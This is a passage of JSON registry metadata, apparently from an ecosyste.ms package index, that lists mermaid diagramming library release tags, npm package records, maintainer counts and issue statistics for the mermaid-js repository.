gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.379Z","dependent_packages_count":0,"downloads":81,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":36.03845943010056,"dependent_packages_count":51.6539152688142,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":43.84618734945738},"purl":"pkg:npm/%40diegosogari/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@diegosogari/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@diegosogari/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@diegosogari/mermaid/dependencies","status":"removed","funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@diegosogari%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@diegosogari%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@diegosogari%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@diegosogari%2Fmermaid/related_packages","maintainers":[{"uuid":"diegosogari","login":"diegosogari","name":null,"email":"diego.sogari@gmail.com","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~diegosogari","role":null,"created_at":"2023-12-18T21:15:18.653Z","updated_at":"2023-12-18T21:15:18.653Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/diegosogari/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7992354,"name":"mmd-ontology-ttl-monorepo","ecosystem":"npm","description":"Markdownish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":null,"versions_count":1,"first_release_published_at":"2023-07-26T14:00:43.386Z","latest_release_published_at":"2023-07-26T14:00:43.386Z","latest_release_number":"10.2.4","last_synced_at":"2025-09-01T12:55:58.712Z","created_at":"2023-07-26T14:03:06.678Z","updated_at":"2025-09-01T14:17:51.348Z","registry_url":"https://www.npmjs.com/package/mmd-ontology-ttl-monorepo","install_command":"npm install mmd-ontology-ttl-monorepo","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.2.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"